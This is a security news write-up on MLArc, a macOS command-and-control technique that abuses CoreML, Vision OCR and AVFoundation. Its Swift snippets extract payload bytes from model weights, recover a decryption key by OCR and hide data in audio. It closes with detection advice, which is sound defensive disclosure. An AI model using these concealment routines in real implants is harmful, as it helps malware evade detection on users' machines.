Security researcher hxr1 has published the second installment of research demonstrating how Apple's native AI frameworks can be weaponized for offensive security operations. The research introduces MLArc, a standalone command-and-control (C2) framework that operates entirely through the Apple AI stack, representing the first public disclosure of Apple AI-assisted payload execution and AI-driven C2 on macOS.

MLArc differs fundamentally from conventional C2 systems that rely on JSON over HTTP, script interpreters, or DLL injection. Instead, it uses AI artifacts themselves as the transport layer, leveraging Apple's native frameworks, including CoreML for machine learning model execution and Vision for image processing. Because every operation routes through legitimate system frameworks, the activity evades detection mechanisms tuned to conventional malware patterns.
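To see why this blends in, consider what ordinary CoreML usage looks like. The sketch below (the model path and file name are hypothetical, not from the research) loads a compiled model exactly the way a benign app would; an implant built on the same calls is indistinguishable at the framework-API level.

```swift
import CoreML

// Hypothetical path; any compiled CoreML model (.mlmodelc) works here.
let modelURL = URL(fileURLWithPath: "/tmp/Classifier.mlmodelc")

// Loading and inspecting a model is routine on-device ML activity.
// A C2 implant built on these same calls generates the same
// framework-level telemetry as a benign inference workload.
let model = try MLModel(contentsOf: modelURL)
print(model.modelDescription.inputDescriptionsByName.keys)
```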

The research demonstrates embedding encrypted shellcode inside CoreML model weight arrays, so the payload hides within what appears to be a legitimate AI model file. Vision's OCR capability is abused as a covert key oracle: encryption keys are concealed inside AI-processed images and retrieved dynamically at execution time to unlock the payload.
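A minimal Swift sketch of the two ideas follows. The weight encoding (one payload byte in the low-order byte of each little-endian Float32) and the key-derivation scheme (SHA-256 of the OCR'd text feeding AES-GCM) are illustrative assumptions; MLArc's actual formats have not been published.

```swift
import Foundation
import Vision
import CryptoKit
import ImageIO

// Recover bytes stashed in the low-order byte of each Float32 "weight".
// (Illustrative encoding; MLArc's real scheme is not public.)
func extractPayload(fromWeights data: Data, byteCount: Int) -> Data {
    var payload = Data()
    for i in 0..<byteCount {
        payload.append(data[data.startIndex + i * 4]) // LSB of little-endian Float32
    }
    return payload
}

// Vision OCR as a key oracle: the passphrase exists only as rendered
// text inside an innocuous image, never as a string in the binary.
func ocrKeyMaterial(imageURL: URL) throws -> String {
    guard let source = CGImageSourceCreateWithURL(imageURL as CFURL, nil),
          let cgImage = CGImageSourceCreateImageAtIndex(source, 0, nil) else {
        throw CocoaError(.fileReadCorruptFile)
    }
    let request = VNRecognizeTextRequest()
    request.recognitionLevel = .accurate
    try VNImageRequestHandler(cgImage: cgImage, options: [:]).perform([request])
    let observations = request.results as? [VNRecognizedTextObservation] ?? []
    return observations.compactMap { $0.topCandidates(1).first?.string }.joined()
}

// Derive an AES key from the OCR'd text and unseal the payload.
func decryptPayload(_ sealed: Data, passphrase: String) throws -> Data {
    let key = SymmetricKey(data: SHA256.hash(data: Data(passphrase.utf8)))
    return try AES.GCM.open(AES.GCM.SealedBox(combined: sealed), using: key)
}
```

On disk, a defender sees only a model file and an image; under this scheme the key material never appears in the Mach-O binary.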

MLArc also exploits the AVFoundation framework, hiding and extracting payloads steganographically in the high-frequency bands of AI-enhanced audio files. Together, these techniques create a sophisticated evasion capability: to monitoring tools, the malicious activity looks like normal AI framework usage.
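As an illustration of the general approach (not MLArc's actual encoding), the sketch below embeds payload bits as the presence or absence of a faint 19 kHz tone in 10 ms windows, recovers them with a Goertzel filter, and writes the result out as an ordinary audio file through AVFoundation. The carrier frequency, window length, amplitude, and threshold are all assumptions.

```swift
import AVFoundation

// All parameters are illustrative assumptions, not MLArc's real values.
let sampleRate = 44_100.0
let carrierHz  = 19_000.0  // near the top of the audible band
let window     = 441       // 10 ms of samples per payload bit

// Encode each bit as presence (1) or absence (0) of a faint tone.
func embed(bits: [Bool]) -> [Float] {
    var samples = [Float](repeating: 0, count: bits.count * window)
    for (i, bit) in bits.enumerated() where bit {
        for n in 0..<window {
            let t = Double(i * window + n) / sampleRate
            samples[i * window + n] = Float(0.02 * sin(2 * .pi * carrierHz * t))
        }
    }
    return samples
}

// Goertzel filter: power of the carrier frequency within one window.
func carrierPower(_ s: ArraySlice<Float>) -> Float {
    let coeff = Float(2 * cos(2 * .pi * carrierHz / sampleRate))
    var s1: Float = 0, s2: Float = 0
    for x in s {
        let s0 = x + coeff * s1 - s2
        s2 = s1
        s1 = s0
    }
    return s1 * s1 + s2 * s2 - coeff * s1 * s2
}

// Recover the bits by thresholding carrier power per window.
func extract(_ samples: [Float], bitCount: Int) -> [Bool] {
    (0..<bitCount).map {
        carrierPower(samples[$0 * window ..< ($0 + 1) * window]) > 1.0
    }
}

// Persist the carrier as an ordinary audio file via AVFoundation.
func write(_ samples: [Float], to url: URL) throws {
    let format = AVAudioFormat(standardFormatWithSampleRate: sampleRate, channels: 1)!
    let buffer = AVAudioPCMBuffer(pcmFormat: format,
                                  frameCapacity: AVAudioFrameCount(samples.count))!
    buffer.frameLength = buffer.frameCapacity
    for (i, v) in samples.enumerated() { buffer.floatChannelData![0][i] = v }
    try AVAudioFile(forWriting: url, settings: format.settings).write(from: buffer)
}
```

In a real implant the tone would presumably be mixed at low amplitude into genuine audio content rather than written out alone, so the file both plays normally and carries the payload.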

The research underscores growing concern about AI frameworks becoming vectors for adversarial operations. Security teams should monitor for unusual CoreML and Vision framework usage patterns, extend allowlisting to AI model files, and treat the AI stack as an attack surface requiring dedicated security controls.